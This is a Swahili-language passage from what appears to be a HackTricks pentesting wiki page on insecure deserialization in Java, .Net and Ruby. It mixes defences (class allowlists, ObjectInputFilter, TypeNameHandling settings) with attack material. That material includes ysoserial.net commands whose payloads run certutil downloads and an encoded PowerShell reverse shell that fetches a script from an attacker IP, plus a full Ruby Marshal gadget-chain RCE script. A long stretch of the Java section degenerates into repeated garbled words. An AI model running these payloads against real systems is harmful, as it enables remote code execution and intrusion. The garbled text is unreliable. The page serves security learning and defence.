* [https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/)

### Kwa nini

Java hutumia uundaji wa tena kwa madhumuni mbalimbali kama vile:

- **Maombi ya HTTP**: Uundaji wa tena hutumiwa sana katika usimamizi wa vigezo, ViewState, vidakuzi, nk.
- **RMI (Remote Method Invocation)**: Itifaki ya Java RMI, ambayo inategemea kabisa uundaji wa tena, ni msingi wa mawasiliano ya mbali katika programu za Java.
- **RMI juu ya HTTP**: Njia hii mara nyingi hutumiwa na programu za wavuti za wateja zinazotumia Java, zikitumia uundaji wa tena kwa mawasiliano yote ya vitu.
- **JMX (Java Management Extensions)**: JMX hutumia uundaji wa tena kwa kuhamisha vitu kupitia mtandao.
- **Itifaki za desturi**: Katika Java, mazoea ya kawaida ni kuhamisha vitu vya Java moja kwa moja, ambavyo vitadhihirishwa katika mifano ya udanganyifu inayofuata.

### Kuzuia

#### Vitu vya muda mfupi

Darasa ambalo linatekeleza `Serializable` linaweza kutekeleza kama `transient` kwa kila kitu ndani ya darasa ambacho hakitakiwi kuwa cha uundaji wa tena. Kwa mfano:
```java
public class myAccount implements Serializable
{
private transient double profit; // declared transient
private transient double margin; // declared transient
```
#### Epuka Ufanyaji wa Mfululizo wa darasa ambalo linahitaji kutekeleza Serializable

Katika hali ambapo vitu fulani vinapaswa kutekeleza kiolesura cha `Serializable` kutokana na muundo wa darasa, kuna hatari ya kufanyika kwa ufananuzi usiokusudiwa. Ili kuzuia hili, hakikisha vitu hivi havifanyiki kwa ufananuzi kwa kufafanua njia ya `final` ya `readObject()` ambayo daima inatupa kosa, kama inavyoonyeshwa hapa chini:
```java
private final void readObject(ObjectInputStream in) throws java.io.IOException {
throw new java.io.IOException("Cannot be deserialized");
}
```
#### **Kuboresha Usalama wa Deserialization katika Java**

**Kubinafsisha `java.io.ObjectInputStream`** ni njia ya vitendo ya kuboresha mchakato wa deserialization. Njia hii ni sahihi wakati:

- Msimbo wa deserialization uko chini ya udhibiti wako.
- Darasa zinazotarajiwa kwa deserialization zinajulikana.

Badilisha njia ya **`resolveClass()`** ili kuzuia deserialization kwa darasa zilizoruhusiwa tu. Hii inazuia deserialization ya darasa lolote isipokuwa zile zilizoruhusiwa wazi, kama ilivyo katika mfano ufuatao ambao unazuia deserialization kwa darasa la `Bicycle` pekee:
```java
// Code from https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html
public class LookAheadObjectInputStream extends ObjectInputStream {

public LookAheadObjectInputStream(InputStream inputStream) throws IOException {
super(inputStream);
}

/**
* Only deserialize instances of our expected Bicycle class
*/
@Override
protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
if (!desc.getName().equals(Bicycle.class.getName())) {
throw new InvalidClassException("Unauthorized deserialization attempt", desc.getName());
}
return super.resolveClass(desc);
}
}
```
**Kutumia Java Agent kwa Kuboresha Usalama** hutoa suluhisho la nyuma wakati marekebisho ya nambari hayawezekani. Njia hii inatumika hasa kwa **kupiga marufuku darasa zenye madhara**, kwa kutumia parameter ya JVM:
```
-javaagent:name-of-agent.jar
```
Inatoa njia ya kuhakikisha deserialization kwa njia ya kudumu, inayofaa kwa mazingira ambapo mabadiliko ya namna ya haraka ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya namna ya nam
```java
ObjectInputFilter filter = info -> {
if (info.depth() > MAX_DEPTH) return Status.REJECTED; // Limit object graph depth
if (info.references() > MAX_REFERENCES) return Status.REJECTED; // Limit references
if (info.serialClass() != null && !allowedClasses.contains(info.serialClass().getName())) {
return Status.REJECTED; // Restrict to allowed classes
}
return Status.ALLOWED;
};
ObjectInputFilter.Config.setSerialFilter(filter);
```
**Kutumia Maktaba za Nje kwa Usalama Ulioboreshwa**: Maktaba kama vile **NotSoSerial**, **jdeserialize**, na **Kryo** zinatoa huduma za hali ya juu kwa udhibiti na ufuatiliaji wa deserialization ya Java. Maktaba hizi zinaweza kutoa safu za ziada za usalama, kama vile kuweka orodha nyeupe au nyeusi ya darasa, kuchambua vitu vilivyosimbwa kabla ya deserialization, na kutekeleza mikakati ya kawaida ya usimbaji.

- **NotSoSerial** inazuia mchakato wa deserialization ili kuzuia utekelezaji wa nambari isiyotegemewa.
- **jdeserialize** inaruhusu uchambuzi wa vitu vilivyosimbwa vya Java bila kusimbua, ikisaidia kutambua yaliyomo yanayoweza kuwa na nia mbaya.
- **Kryo** ni mfumo mbadala wa usimbaji ambao unasisitiza kasi na ufanisi, ukitoa mikakati ya usimbaji inayoweza kusanidiwa ambayo inaweza kuimarisha usalama.

### Marejeo

* [https://cheatsheetseries.owasp.org/cheatsheets/Deserialization\_Cheat\_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization\_Cheat\_Sheet.html)
* Mazungumzo juu ya Deserialization na ysoserial: [http://frohoff.github.io/appseccali-marshalling-pickles/](http://frohoff.github.io/appseccali-marshalling-pickles/)
* [https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/](https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)
* [https://www.youtube.com/watch?v=VviY3O-euVQ](https://www.youtube.com/watch?v=VviY3O-euVQ)
* Mazungumzo juu ya gadgetinspector: [https://www.youtube.com/watch?v=wPbW6zQ52w8](https://www.youtube.com/watch?v=wPbW6zQ52w8) na slaidi: [https://i.blackhat.com/us-18/Thu-August-9/us-18-Haken-Automated-Discovery-of-Deserialization-Gadget-Chains.pdf](https://i.blackhat.com/us-18/Thu-August-9/us-18-Haken-Automated-Discovery-of-Deserialization-Gadget-Chains.pdf)
* Karatasi ya Marshalsec: [https://www.github.com/mbechler/marshalsec/blob/master/marshalsec.pdf?raw=true](https://www.github.com/mbechler/marshalsec/blob/master/marshalsec.pdf?raw=true)
* [https://dzone.com/articles/why-runtime-compartmentalization-is-the-most-compr](https://dzone.com/articles/why-runtime-compartmentalization-is-the-most-compr)
* [https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html](https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html)
* [https://deadcode.me/blog/2016/09/18/Blind-Java-Deserialization-Part-II.html](https://deadcode.me/blog/2016/09/18/Blind-Java-Deserialization-Part-II.html)
* Karatasi juu ya deserialziations CVEs: [https://paper.seebug.org/123/](https://paper.seebug.org/123/)

## Uingizaji wa JNDI na log4Shell

Pata kile **Uingizaji wa JNDI** ni nini, jinsi ya kuitumia kupitia RMI, CORBA, na LDAP na jinsi ya kufaidika na log4shell (na mfano wa udhaifu huu) katika ukurasa ufuatao:

{% content-ref url="jndi-java-naming-and-directory-interface-and-log4shell.md" %}
[jndi-java-naming-and-directory-interface-and-log4shell.md](jndi-java-naming-and-directory-interface-and-log4shell.md)
{% endcontent-ref %}

## JMS - Huduma ya Ujumbe ya Java

> API ya **Huduma ya Ujumbe ya Java** (**JMS**) ni API ya Java ya kati ya ujumbe kwa kutuma ujumbe kati ya wateja wawili au zaidi. Ni utekelezaji wa kutatua tatizo la mtengenezaji-mtumiaji. JMS ni sehemu ya Java Platform, Enterprise Edition (Java EE), na ilifafanuliwa na maelezo yaliyotengenezwa na Sun Microsystems, lakini ambayo tangu wakati huo imeongozwa na Java Community Process. Ni kiwango cha ujumbe kinachoruhusu sehemu za programu zinazotegemea Java EE kuunda, kutuma, kupokea, na kusoma ujumbe. Inaruhusu mawasiliano kati ya sehemu tofauti za programu iliyosambazwa kuwa huru, ya kuaminika, na ya kusubiri. (Kutoka [Wikipedia](https://en.wikipedia.org/wiki/Java\_Message\_Service)).

### Bidhaa

Kuna bidhaa kadhaa zinazotumia huduma hii ya kati ya ujumbe kutuma ujumbe:

![https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities.pdf](<../../.gitbook/assets/image (291).png>)

![https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities.pdf](<../../.gitbook/assets/image (292).png>)

### Ufisadi

Kwa hiyo, kimsingi kuna **huduma kadhaa zinazotumia JMS kwa njia hatari**. Kwa hivyo, ikiwa una **mamlaka ya kutosha** kutuma ujumbe kwa huduma hizi (kawaida utahitaji vitambulisho halali) unaweza kuwa na uwezo wa kutuma vitu vilivyosimbwa vibaya ambavyo vitasimbwa upya na mtumiaji/mpokeaji. Hii inamaanisha kuwa katika udanganyifu huu, **wateja wote wanaotumia ujumbe huo wataambukizwa**.

Lazima ukumbuke kwamba hata ikiwa huduma ni dhaifu (kwa sababu inasimbua kuingia kwa mtumiaji kwa njia isiyofaa), bado unahitaji kupata vifaa sahihi vya kufaidika na udhaifu huo.

Zana ya [JMET](https://github.com/matthiaskaiser/jmet) iliumbwa ili **kuunganisha na kushambulia huduma hizi kwa kutuma vitu vilivyosimbwa vibaya kwa kutumia vifaa vilivyojulikana**. Mashambulizi haya yatafanya kazi ikiwa huduma bado ni dhaifu na ikiwa kifaa chochote kilichotumiwa kipo ndani ya programu dhaifu.

### Marejeo

* Mazungumzo juu ya JMET: [https://www.youtube.com/watch?v=0h8DWiOWGGA](https://www.youtube.com/watch?v=0h8DWiOWGGA)
* Slaidi: [https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities.pdf](https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities.pdf)

## .Net

Katika muktadha wa .Net, udanganyifu wa deserialization hufanya kazi kwa njia kama ile inayopatikana katika Java, ambapo vifaa vinatumika kufanya nambari maalum iendelee wakati wa deserialization ya kitu.
### Kuchunguza Alama za Vidole

#### WhiteBox

Msimbo wa chanzo unapaswa kukaguliwa kwa kuwepo kwa:

1. `TypeNameHandling`
2. `JavaScriptTypeResolver`

Uzingatiaji unapaswa kuwa kwenye zana za kubadilisha data ambazo huruhusu aina ya data kuamuliwa na kivinjari kinachodhibitiwa na mtumiaji.

#### BlackBox

Utafutaji unapaswa kulenga kwenye herufi zilizofichwa kwa msingi wa Base64 **AAEAAAD/////** au mfano wowote unaofanana ambao unaweza kufanyiwa deserialization upande wa seva, ukiruhusu udhibiti juu ya aina ya data inayofanyiwa deserialization. Hii inaweza kujumuisha, lakini sio tu, muundo wa **JSON** au **XML** unaotumia `TypeObject` au `$type`.

### ysoserial.net

Katika kesi hii, unaweza kutumia zana [**ysoserial.net**](https://github.com/pwntester/ysoserial.net) ili **kuunda mashambulizi ya deserialization**. Mara baada ya kupakua hifadhi ya git, unapaswa **kukusanya zana** hiyo kwa kutumia Visual Studio kwa mfano.

Ikiwa unataka kujifunza kuhusu **jinsi ysoserial.net inavyounda mashambulizi yake**, unaweza [**kutembelea ukurasa huu ambapo inaelezwa kifaa cha ObjectDataProvider + ExpandedWrapper + Json.Net formatter**](basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md).

Chaguo kuu za **ysoserial.net** ni: **`--gadget`**, **`--formatter`**, **`--output`** na **`--plugin`.**

* **`--gadget`** hutumiwa kuonyesha kifaa cha kutumia (onyesha darasa/fungsi ambayo itatumika wakati wa deserialization ili kutekeleza amri).
* **`--formatter`**, hutumiwa kuonyesha njia ya kubadilisha data ya mashambulizi (unahitaji kujua ni maktaba gani inayotumiwa na seva ya nyuma ili kubadilisha data na utumie hiyo hiyo kubadilisha data).
* **`--output`** hutumiwa kuonyesha ikiwa unataka mashambulizi kuwa katika muundo wa **raw** au **base64**. _Tafadhali kumbuka kwamba **ysoserial.net** ita **ficha** data ya mashambulizi kwa kutumia **UTF-16LE** (muundo wa kawaida unaotumiwa na Windows) kwa hivyo ikiwa unapata data ya mashambulizi na kuiweka tu kwenye konsoli ya Linux, unaweza kukutana na **matatizo ya utangamano wa muundo** ambayo yatasababisha mashambulizi kutofanya kazi vizuri (kwenye sanduku la HTB JSON, data ya mashambulizi ilifanya kazi kwa UTF-16LE na ASCII lakini hii haimaanishi itafanya kazi kila wakati)._
* **`--plugin`** ysoserial.net inasaidia programu-jalizi za kuunda **mashambulizi kwa fremu maalum** kama ViewState

#### Vigezo Zaidi vya ysoserial.net

* `--minify` itatoa data ya mashambulizi ndogo (ikiwezekana)
* `--raf -f Json.Net -c "chochote"` Hii itaonyesha vifaa vyote vinavyoweza kutumika na kubadilisha data iliyotolewa (`Json.Net` katika kesi hii)
* `--sf xml` unaweza **kuonyesha kifaa** (`-g`) na ysoserial.net itatafuta kubadilisha data zinazohusiana na "xml" (bila kujali herufi kubwa au ndogo)

**Mifano ya ysoserial** ya kuunda mashambulizi:
```bash
#Send ping
ysoserial.exe -g ObjectDataProvider -f Json.Net -c "ping -n 5 10.10.14.44" -o base64

#Timing
#I tried using ping and timeout but there wasn't any difference in the response timing from the web server

#DNS/HTTP request
ysoserial.exe -g ObjectDataProvider -f Json.Net -c "nslookup sb7jkgm6onw1ymw0867mzm2r0i68ux.burpcollaborator.net" -o base64
ysoserial.exe -g ObjectDataProvider -f Json.Net -c "certutil -urlcache -split -f http://rfaqfsze4tl7hhkt5jtp53a1fsli97.burpcollaborator.net/a a" -o base64

#Reverse shell
#Create shell command in linux
echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.44/shell.ps1')" | iconv  -t UTF-16LE | base64 -w0
#Create exploit using the created B64 shellcode
ysoserial.exe -g ObjectDataProvider -f Json.Net -c "powershell -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADQANAAvAHMAaABlAGwAbAAuAHAAcwAxACcAKQA=" -o base64
```
**ysoserial.net** pia ina **parameta ya kuvutia sana** ambayo inasaidia kuelewa jinsi kila shambulio linavyofanya kazi: `--test`\
Ikiwa unaweka parameta hii, **ysoserial.net** itajaribu shambulio **kwenye kompyuta yako**, hivyo unaweza kujaribu kama mzigo wako utafanya kazi kwa usahihi.\
Parameta hii ni muhimu kwa sababu ikiwa utapitia nambari utapata sehemu za nambari kama hii ifuatayo (kutoka [ObjectDataProviderGenerator.cs](https://github.com/pwntester/ysoserial.net/blob/c53bd83a45fb17eae60ecc82f7147b5c04b07e42/ysoserial/Generators/ObjectDataProviderGenerator.cs#L208)):
```java
if (inputArgs.Test)
{
try
{
SerializersHelper.JsonNet_deserialize(payload);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
```
Hii inamaanisha kwamba ili kujaribu kutumia udanganyifu, namna ya kificho itaita [serializersHelper.JsonNet\_deserialize](https://github.com/pwntester/ysoserial.net/blob/c53bd83a45fb17eae60ecc82f7147b5c04b07e42/ysoserial/Helpers/SerializersHelper.cs#L539)
```java
public static object JsonNet_deserialize(string str)
{
Object obj = JsonConvert.DeserializeObject<Object>(str, new JsonSerializerSettings
{
TypeNameHandling = TypeNameHandling.Auto
});
return obj;
}
```
Katika **msimbo uliopita una hatari ya kudukuliwa**. Kwa hivyo, ikiwa unapata kitu kama hicho katika programu ya .Net, inamaanisha kuwa labda programu hiyo pia ina hatari.\
Kwa hivyo, **parameter ya --test** inaturuhusu kuelewa **vipande vipi vya msimbo vina hatari** ya kudukuliwa kwa kutumia udanganyifu wa deserialization ambao **ysoserial.net** inaweza kuunda.

### ViewState

Angalia [POST hii kuhusu **jinsi ya kujaribu kudukua parameter ya \_\_ViewState ya .Net**](exploiting-\_\_viewstate-parameter.md) ili **kutekeleza msimbo wa kiholela**. Ikiwa **tayari unajua siri** zinazotumiwa na mashine ya mwathirika, [**soma chapisho hili ili kujua jinsi ya kutekeleza msimbo**](exploiting-\_\_viewstate-knowing-the-secret.md)**.**

### Kuzuia

Ili kupunguza hatari zinazohusiana na deserialization katika .Net:

- **Epuka kuruhusu mtiririko wa data kuamua aina zake za vitu.** Tumia `DataContractSerializer` au `XmlSerializer` iwezekanavyo.

- **Kwa `JSON.Net`, weka `TypeNameHandling` kuwa `None`:**
%%%TypeNameHandling = TypeNameHandling.None%%%

- **Epuka kutumia `JavaScriptSerializer` na `JavaScriptTypeResolver`.**

- **Punguza aina zinazoweza kudukuliwa**, ukitambua hatari zilizojumuishwa na aina za .Net, kama vile `System.IO.FileInfo`, ambayo inaweza kubadilisha mali za faili za seva, na hivyo kusababisha mashambulizi ya kukataa huduma.

- **Kuwa makini na aina zenye mali hatari**, kama vile `System.ComponentModel.DataAnnotations.ValidationException` na mali yake ya `Value`, ambayo inaweza kudukuliwa.

- **Dhibiti kwa usalama uanzishaji wa aina** ili kuzuia wadukuzi kuathiri mchakato wa deserialization, hata kufanya `DataContractSerializer` au `XmlSerializer` kuwa na hatari.

- **Tumia udhibiti wa orodha nyeupe** kwa kutumia `SerializationBinder` ya desturi kwa `BinaryFormatter` na `JSON.Net`.

- **Endelea kujulishwa kuhusu vitu vya deserialization visivyo salama** katika .Net na hakikisha deserializers haziumbi aina hizo.

- **Tenga msimbo wenye hatari** kutoka kwa msimbo unaofikia wavuti ili kuepuka kuweka vitu vya deserialization vinavyojulikana, kama vile `System.Windows.Data.ObjectDataProvider` katika programu za WPF, kwa vyanzo vya data zisizoaminika.

### **Marejeo**

* Karatasi ya deserialization ya JSON ya Java na .Net: [**https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf**](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf)**,** mazungumzo: [https://www.youtube.com/watch?v=oUAeWhW5b8c](https://www.youtube.com/watch?v=oUAeWhW5b8c) na slaidi: [https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf)
* [https://cheatsheetseries.owasp.org/cheatsheets/Deserialization\_Cheat\_Sheet.html#net-csharp](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization\_Cheat\_Sheet.html#net-csharp)
* [https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH\_US\_12\_Forshaw\_Are\_You\_My\_Type\_WP.pdf](https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH\_US\_12\_Forshaw\_Are\_You\_My\_Type\_WP.pdf)
* [https://www.slideshare.net/MSbluehat/dangerous-contents-securing-net-deserialization](https://www.slideshare.net/MSbluehat/dangerous-contents-securing-net-deserialization)

## **Ruby**

Katika Ruby, usanifishaji unawezeshwa na njia mbili ndani ya maktaba ya **marshal**. Njia ya kwanza, inayojulikana kama **dump**, hutumiwa kubadilisha kitu kuwa mtiririko wa herufi. Mchakato huu unaitwa usanifishaji. Kwa upande mwingine, njia ya pili, **load**, hutumiwa kurejesha mtiririko wa herufi kuwa kitu, mchakato unaojulikana kama deserialization.

Kwa kusimamia vitu vilivyosanifishwa, **Ruby hutumia HMAC (Hash-Based Message Authentication Code)**, ikidhibitisha uadilifu na uhalali wa data. Neno la siri linalotumiwa kwa kusudi hili linahifadhiwa katika moja ya maeneo kadhaa yanayowezekana:

- `config/environment.rb`
- `config/initializers/secret_token.rb`
- `config/secrets.yml`
- `/proc/self/environ`

**Mnyororo wa vitu vya deserialization ya kawaida ya Ruby 2.X hadi RCE (taarifa zaidi katika [https://www.elttam.com/blog/ruby-deserialization/](https://www.elttam.com/blog/ruby-deserialization/))**:
```ruby
#!/usr/bin/env ruby

# Code from https://www.elttam.com/blog/ruby-deserialization/

class Gem::StubSpecification
def initialize; end
end


stub_specification = Gem::StubSpecification.new
stub_specification.instance_variable_set(:@loaded_from, "|id 1>&2")#RCE cmd must start with "|" and end with "1>&2"

puts "STEP n"
stub_specification.name rescue nil
puts


class Gem::Source::SpecificFile
def initialize; end
end

specific_file = Gem::Source::SpecificFile.new
specific_file.instance_variable_set(:@spec, stub_specification)

other_specific_file = Gem::Source::SpecificFile.new

puts "STEP n-1"
specific_file <=> other_specific_file rescue nil
puts


$dependency_list= Gem::DependencyList.new
$dependency_list.instance_variable_set(:@specs, [specific_file, other_specific_file])

puts "STEP n-2"
$dependency_list.each{} rescue nil
puts


class Gem::Requirement
def marshal_dump
[$dependency_list]
end
end

payload = Marshal.dump(Gem::Requirement.new)

puts "STEP n-3"
Marshal.load(payload) rescue nil
puts


puts "VALIDATION (in fresh ruby process):"
IO.popen("ruby -e 'Marshal.load(STDIN.read) rescue nil'", "r+") do |pipe|
pipe.print payload
pipe.close_write
puts pipe.gets
puts
end

puts "Payload (hex):"
puts payload.unpack('H*')[0]
puts


require "base64"
puts "Payload (Base64 encoded):"
puts Base64.encode64(payload)
```
Mnyororo mwingine wa RCE kwa kufaidika na Ruby On Rails: [https://codeclimate.com/blog/rails-remote-code-execution-vulnerability-explained/](https://codeclimate.com/blog/rails-remote-code-execution-vulnerability-explained/)

<details>

<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.

</details>